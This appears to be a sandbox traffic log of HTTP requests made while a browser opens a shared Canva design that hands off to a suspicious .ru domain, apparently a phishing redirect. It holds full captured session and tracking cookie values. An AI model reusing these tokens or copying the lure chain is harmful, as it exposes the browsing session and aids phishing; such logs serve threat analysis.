    Source: global trafficHTTP traffic detected: GET /web/ed3781c5c1cc0c75.js HTTP/1.1Host: static.canva.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000; _ga=GA1.1.2124219403.1734643655; _ga_EPWEMH6717=GS1.1.1734643654.1.0.1734643654.0.0.659039570; FPID=FPID2.2.LL74t9zFTA5xmGskwldRBU3NcijHs0WLYaB541gedDg%3D.1734643655; FPLC=MAQbZ7LoNLTcVgVa2jeEam7hsKcz%2BhrzXc8L4dhRg%2BygKya4oPWjGpNFRJ9uED0to3GIyvOle9%2F8ueCrRHFdccXQX73dvcYw87MtvIPl%2Fqk3rAkjhIteb020PcK4pw%3D%3D
    Source: global trafficHTTP traffic detected: GET /ddm/fls/z/src=9812343;type=websi000;cat=flood0;ord=247230614;gtm=45j91e4c50v872399471z8812729902z9848341198za200zb812729902;dc_pre=1;u59=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGZxEJMIA0%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink2%26utm_source%3Duniquelinks%26utlId%3Dhdcdec8ed4a;u67=guest;u66=false;dma=0;npa=0;gcd=13l3l3l3l1l1;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;tag_exp=101925629~102067555~102067808~102081485~102198178;ps=1;pcor=324257022;s3p=1;~oref=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGZxEJMIA0%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink2%26utm_source%3Duniquelinks%26utlId%3Dhdcdec8ed4a HTTP/1.1Host: adservice.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /static/images/favicon-1.ico HTTP/1.1Host: static.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000; cf_clearance=seJbdCFReQ8X7FRP8xj5KdCF6aVtkbK0ltFBRgiPpaA-1734643652-1.2.1.1-F7GANrUEdYEGcJEE7_Lqms6Fk.6es5izV2_35iKfbP1cUaIj6f4INdCgs6SLlanODcHhy.6yt1_MBMmxDYlbg2vF3Q76P_bRTxzU8PfQkF9hs01bBqzpxHdc3Pmxxh8cHMHaKok_5VKE6pJlNvA3pC7GAMIdaDnU4zXEUQDqngL9EFPru48PCWqVPZW17.FFC8IwE3PwFr45cPBDMtZPEoJdEmTDExzBukuPtM9uGRoAURI0DmR6KTvjDgBt5EsQHLsMAmBGMuabhFTmFqYqjVdkx8_9hPdhyYlVrrwcP_Sbye02rdb2HJfhC3v58x4LSTPH9E6jYgFkKfKO8qgkNeK0B6tVhXrkV.swlG.ikPUvuZiiYyY1Irbw.crvlKRD; _ga=GA1.1.2124219403.1734643655; _ga_EPWEMH6717=GS1.1.1734643654.1.0.1734643654.0.0.659039570; FPID=FPID2.2.LL74t9zFTA5xmGskwldRBU3NcijHs0WLYaB541gedDg%3D.1734643655; FPLC=iXUqyvIydFpwl7XXa9K64SvmeL%2F%2FMTji7nTeBo05Th040svWJMVFQljR3%2BPeFSp8S7dVUpgLEabZoNIEKBFboDK1Xd0NNCjJaZ42FWoKukmv91PXxcLdIeiajgv%2Fzg%3D%3D
    Source: global trafficHTTP traffic detected: GET /pagead/1p-conversion/804757079/?random=960307558&fst=1734643657472&cv=10&fmt=3&label=YaxKCKTJlYwYENe83v8C&bg=ffffff&guid=ON&u_w=1280&u_h=1024&gtm=45j91e4c50v872399471z8812729902z9848341198za200zb812729902&value=0&url=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGZxEJMIA0%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink2%26utm_source%3Duniquelinks%26utlId%3Dhdcdec8ed4a&tiba=Canva%20Design&data=event%3Dnew.user.engagement%3Bgtm_web_details%3DGTM-TZPTKRR%20%7C%20297%3Bevent_id%3D1734644380069_173464376514863%3Bcustom_dicbo%3Dnot%20set%3Bcustom_consent_gtm_outbrain%3Dyes%3Bcustom_consent_gtm_fpc_rtid%3Dyes%3Bcustom_data_newSession2%3D1%3Bcustom_device_category%3Ddesktop%3Bcustom_event_name%3Dnew.user.engagement%3Bcustom_quantity%3D0%3Bcustom_step%3Dnot%20set%3Bcustom_user_type_by_user_id%3Dguest%3Bevent_action%3Dno-value%3Bcustom_doctype_id%3DTAFJi5FXMSs%3Bcustom_product_variant%3Dweb-2%3Bcustom_country_code%3DUS%3Bcustom_app_name%3Dweb&rdp=1&dma=0&npa=0&gcd=13l3l3l3l1l1&ec_mode=c&uip=8.46.123.0&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&pscdl=noapi&tag_exp=101925629~102067555~102067808~102081485~102198178&s3p=1&ct_cookie_present=false&crd=CLHBsQIIsMGxAgixw7ECCIrFsQIIwsmxAgjrxrECCKPFsQII08WxAiIBAUABSid0cmlnZ2VyO25hdmlnYXRpb24tc291cmNlLCBldmVudC1zb3VyY2ViBAoCAgM&pscrd=CISYhdiUnbCDeSITCJWwtJnjtIoDFY1EHQkdurMqaTICCAMyAggEMgIIBzICCAgyAggJMgIICjICCAIyAggLMgIIFTICCB8yAggTMgIIEjoWaHR0cHM6Ly93d3cuY2FudmEuY29tLw&is_vtc=1&cid=CAQSKQCa7L7dDOYJdi02Nb79onvCexLh_XI94ohyYMcbA-T3kydnGjWpfy-F&eitems=ChAIgKWPuwYQ_Ivq-YrJqPJ0Eh0ATXZP9IyHoRVZZJ_JmuzO0lRAjDrS6fHVmpfWwg&random=3727329767 HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /_ajax/ae/createBatch HTTP/1.1Host: www.canva.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CDI=04b60d8a-0afb-4ec1-9086-045d7e0ec7dd; CPA=cnvanTz1hOxPVUJgop6_IlmuWwa-NtyfWx2O1ceJGGLF020n1ZV1iKl7wwDbWBY1Z5UjC1zWarjFNtvOsTB9ze88FeebuPUzY_v79VpdqxDEtzLk9WJhLeSQQjH7JN6qNs-Wtc6o7zrq2JaxSKJ8fHuCDlyVjZdk-rMvs92E0iCq3Z4e_Ddaw8ql5C7MfUKyYgGsGiVJjn3AbdJRGWNuAOZuRWS1q9P0RyLvZo6y3BpPPawIZcZBR6IG9jF176jVnVHy8rFl75lXO4qS_AEGcl534B5JhWxjJqIBv8qqSSKzICruOChEyLtZQbqiZYNoH_EsNTC2n3egVJXzYG-VSbcKWyiEOPkya2G12OS0p-zdBS6xGrr1f720lFYes8MQuJrJu7esh07zUdQtvmvxWQR1vWUuxrmnxfZZMFEwzJPOQXZL6A7VX3oRNQCb1Kzf0dJnvmOj6qoLIrdZzZXvRU96Dlzm6I9fzkJh0nMUj609KEEKP28z8jIw5ITGlSaSLeAalv51mKABcq9K8DNq1VX_wz7_VcUr_Sjqabe-VYjoRVD1Z4JInkjYHE6xUUNellFfFr9r3Bw15690698; CCK=a_O3O23kihyJVif7Fk2gFQ; __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000; ASI=01JFGD2YV02D5APP1T8YZ7689M; gtm_fpc_engagement_event={"url":"https://www.canva.com/design/DAGZxEJMIA0/pFi0b1a1Y78oAGDuII8Hjg/view?utm_content=DAGZxEJMIA0&utm_campaign=designshare&utm_medium=link2&utm_source=uniquelinks&utlId=hdcdec8ed4a","ts":1734643651404,"utm_s":"uniquelinks","utm_m":"link2"}; Metadata_visitor_id=m4vu1ljwisbrprgjbso; Metadata_session_id=m4vu1ljx4jdkqcpbcgc; _ga=GA1.1.2124219403.1734643655; _ga_EPWEMH6717=GS1.1.1734643654.1.0.1734643654.0.0.659039570; FPID=FPID2.2.LL74t9zFTA5xmGskwldRBU3NcijHs0WLYaB541gedDg%3D.1734643655; FPLC=iXUqyvIydFpwl7XXa9K64SvmeL%2F%2FMTji7nTeBo05Th040svWJMVFQljR3%2BPeFSp8S7dVUpgLEabZoNIEKBFboDK1Xd0NNCjJaZ42FWoKukmv91PXxcLdIeiajgv%2Fzg%3D%3D
    Source: global trafficHTTP traffic detected: GET /static/images/favicon-1.ico HTTP/1.1Host: static.canva.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000; _ga=GA1.1.2124219403.1734643655; _ga_EPWEMH6717=GS1.1.1734643654.1.0.1734643654.0.0.659039570; FPID=FPID2.2.LL74t9zFTA5xmGskwldRBU3NcijHs0WLYaB541gedDg%3D.1734643655; FPLC=iXUqyvIydFpwl7XXa9K64SvmeL%2F%2FMTji7nTeBo05Th040svWJMVFQljR3%2BPeFSp8S7dVUpgLEabZoNIEKBFboDK1Xd0NNCjJaZ42FWoKukmv91PXxcLdIeiajgv%2Fzg%3D%3D
    Source: global trafficHTTP traffic detected: GET /spp.pl?a=10000&.yp=10137834&gtmcb=1957190974 HTTP/1.1Host: sp.analytics.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /i?aid=canva-aad9e5ad-3a29-42d3-a4e3-b2a423a0bfe7&e=pv&p=web&tv=1x1&url=www.canva.com&refr=&uid=undefined&gtmcb=783739181 HTTP/1.1Host: p.tvpixel.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /p?c1=2&c2=34402982&ns_type=hidden&ns_event=page_view&c6=canva-aad9e5ad-3a29-42d3-a4e3-b2a423a0bfe7&c7=&c9=&c8=&gtmcb=1610630260 HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /spp.pl?a=10000&.yp=10137834&gtmcb=1957190974 HTTP/1.1Host: sp.analytics.yahoo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A3=d=AQABBNWPZGcCEF41nL8rufc-sEzDw34OyqYFEgEBAQHhZWduZ9xS0iMA_eMAAA&S=AQAAAhlKvtvio19ZM0EiElG_jq4
    Source: global trafficHTTP traffic detected: GET /i?aid=canva-aad9e5ad-3a29-42d3-a4e3-b2a423a0bfe7&e=pv&p=web&tv=1x1&url=www.canva.com&refr=&uid=undefined&gtmcb=783739181 HTTP/1.1Host: p.tvpixel.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: sp=da8c0ec1-5c9d-478b-85a1-77ccfcb7becb
    Source: global trafficHTTP traffic detected: GET /p2?c1=2&c2=34402982&ns_type=hidden&ns_event=page_view&c6=canva-aad9e5ad-3a29-42d3-a4e3-b2a423a0bfe7&c7=&c9=&c8=&gtmcb=1610630260 HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: UID=13Dfb7d508bf078883371d51734643670; XID=13Dfb7d508bf078883371d51734643670
    Source: global trafficHTTP traffic detected: GET /_ajax/ae/createBatch HTTP/1.1Host: www.canva.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CDI=04b60d8a-0afb-4ec1-9086-045d7e0ec7dd; CPA=cnvanTz1hOxPVUJgop6_IlmuWwa-NtyfWx2O1ceJGGLF020n1ZV1iKl7wwDbWBY1Z5UjC1zWarjFNtvOsTB9ze88FeebuPUzY_v79VpdqxDEtzLk9WJhLeSQQjH7JN6qNs-Wtc6o7zrq2JaxSKJ8fHuCDlyVjZdk-rMvs92E0iCq3Z4e_Ddaw8ql5C7MfUKyYgGsGiVJjn3AbdJRGWNuAOZuRWS1q9P0RyLvZo6y3BpPPawIZcZBR6IG9jF176jVnVHy8rFl75lXO4qS_AEGcl534B5JhWxjJqIBv8qqSSKzICruOChEyLtZQbqiZYNoH_EsNTC2n3egVJXzYG-VSbcKWyiEOPkya2G12OS0p-zdBS6xGrr1f720lFYes8MQuJrJu7esh07zUdQtvmvxWQR1vWUuxrmnxfZZMFEwzJPOQXZL6A7VX3oRNQCb1Kzf0dJnvmOj6qoLIrdZzZXvRU96Dlzm6I9fzkJh0nMUj609KEEKP28z8jIw5ITGlSaSLeAalv51mKABcq9K8DNq1VX_wz7_VcUr_Sjqabe-VYjoRVD1Z4JInkjYHE6xUUNellFfFr9r3Bw15690698; CCK=a_O3O23kihyJVif7Fk2gFQ; __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000; ASI=01JFGD2YV02D5APP1T8YZ7689M; gtm_fpc_engagement_event={"url":"https://www.canva.com/design/DAGZxEJMIA0/pFi0b1a1Y78oAGDuII8Hjg/view?utm_content=DAGZxEJMIA0&utm_campaign=designshare&utm_medium=link2&utm_source=uniquelinks&utlId=hdcdec8ed4a","ts":1734643651404,"utm_s":"uniquelinks","utm_m":"link2"}; Metadata_visitor_id=m4vu1ljwisbrprgjbso; Metadata_session_id=m4vu1ljx4jdkqcpbcgc; _ga=GA1.1.2124219403.1734643655; _ga_EPWEMH6717=GS1.1.1734643654.1.0.1734643654.0.0.659039570; FPID=FPID2.2.LL74t9zFTA5xmGskwldRBU3NcijHs0WLYaB541gedDg%3D.1734643655; FPLC=iXUqyvIydFpwl7XXa9K64SvmeL%2F%2FMTji7nTeBo05Th040svWJMVFQljR3%2BPeFSp8S7dVUpgLEabZoNIEKBFboDK1Xd0NNCjJaZ42FWoKukmv91PXxcLdIeiajgv%2Fzg%3D%3D
    Source: global trafficHTTP traffic detected: GET /z9yaFIg/ HTTP/1.1Host: 58ts.vomlogsffy.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /p2?c1=2&c2=34402982&ns_type=hidden&ns_event=page_view&c6=canva-aad9e5ad-3a29-42d3-a4e3-b2a423a0bfe7&c7=&c9=&c8=&gtmcb=1610630260 HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: UID=13Dfb7d508bf078883371d51734643670
    Source: global trafficHTTP traffic detected: GET /_ajax/ae/createBatch HTTP/1.1Host: www.canva.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CDI=04b60d8a-0afb-4ec1-9086-045d7e0ec7dd; CPA=cnvanTz1hOxPVUJgop6_IlmuWwa-NtyfWx2O1ceJGGLF020n1ZV1iKl7wwDbWBY1Z5UjC1zWarjFNtvOsTB9ze88FeebuPUzY_v79VpdqxDEtzLk9WJhLeSQQjH7JN6qNs-Wtc6o7zrq2JaxSKJ8fHuCDlyVjZdk-rMvs92E0iCq3Z4e_Ddaw8ql5C7MfUKyYgGsGiVJjn3AbdJRGWNuAOZuRWS1q9P0RyLvZo6y3BpPPawIZcZBR6IG9jF176jVnVHy8rFl75lXO4qS_AEGcl534B5JhWxjJqIBv8qqSSKzICruOChEyLtZQbqiZYNoH_EsNTC2n3egVJXzYG-VSbcKWyiEOPkya2G12OS0p-zdBS6xGrr1f720lFYes8MQuJrJu7esh07zUdQtvmvxWQR1vWUuxrmnxfZZMFEwzJPOQXZL6A7VX3oRNQCb1Kzf0dJnvmOj6qoLIrdZzZXvRU96Dlzm6I9fzkJh0nMUj609KEEKP28z8jIw5ITGlSaSLeAalv51mKABcq9K8DNq1VX_wz7_VcUr_Sjqabe-VYjoRVD1Z4JInkjYHE6xUUNellFfFr9r3Bw15690698; CCK=a_O3O23kihyJVif7Fk2gFQ; __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000; ASI=01JFGD2YV02D5APP1T8YZ7689M; gtm_fpc_engagement_event={"url":"https://www.canva.com/design/DAGZxEJMIA0/pFi0b1a1Y78oAGDuII8Hjg/view?utm_content=DAGZxEJMIA0&utm_campaign=designshare&utm_medium=link2&utm_source=uniquelinks&utlId=hdcdec8ed4a","ts":1734643651404,"utm_s":"uniquelinks","utm_m":"link2"}; Metadata_visitor_id=m4vu1ljwisbrprgjbso; Metadata_session_id=m4vu1ljx4jdkqcpbcgc; _ga=GA1.1.2124219403.1734643655; _ga_EPWEMH6717=GS1.1.1734643654.1.0.1734643654.0.0.659039570; FPID=FPID2.2.LL74t9zFTA5xmGskwldRBU3NcijHs0WLYaB541gedDg%3D.1734643655; FPLC=iXUqyvIydFpwl7XXa9K64SvmeL%2F%2FMTji7nTeBo05Th040svWJMVFQljR3%2BPeFSp8S7dVUpgLEabZoNIEKBFboDK1Xd0NNCjJaZ42FWoKukmv91PXxcLdIeiajgv%2Fzg%3D%3D
    Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://58ts.vomlogsffy.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: 58ts.vomlogsffy.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://58ts.vomlogsffy.ru/z9yaFIg/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImZlYUhxLzV0VlZpc3VtNEtFdmM1TUE9PSIsInZhbHVlIjoia1N5MkNRb3ZxNkJLL3phWUdhOUdWMGFOUGpSUkErS3JDOWszUys1eEpISTdZb0E0UGdmck9KSFNGRXY0c0xZaG5iOXZSWktuVG10d2J4elI0ajIrSmJGZ2hUdDIwbzlwQ21La05qdnhrT2xXU3lrTG4xR1ZSSXMyS1pqcDVOWUYiLCJtYWMiOiIyMzBlNGNiMDA3ZDkwMjM0ZjE4MGE0MGIzODMzMDUzZTViYWY0Nzg5NDcxOGUxM2U5MjU0OWVhZDBjOGVlNDVkIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjN3UkFPRXlNdW9pd0Q3aGhHWGJ4NlE9PSIsInZhbHVlIjoiRUhIY1hjWDFJV1czVUJvQ3NNTWQ3YmRzdUFPMnpPdGRPNHhvdDNpV1NPM05uZEpncDJEcllHZmc4MkkxZkhvejloK0tvTzFSRytUOEhIdDlLUTJEYXJNK3FveDdBcmJpRVZtWlVML3BBeDRWM1gzQUFwU1NWOG5Ba1psWTZhTUIiLCJtYWMiOiIyOThlYzMzOGQ5MzI1MDkyZTIwMTA2ODFjZmEwYTM2OGNkMzlhY2Y3MDEwNzc3NThlZmFlN2FiZDYxMTIxY2ZiIiwidGFnIjoiIn0%3D
    Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
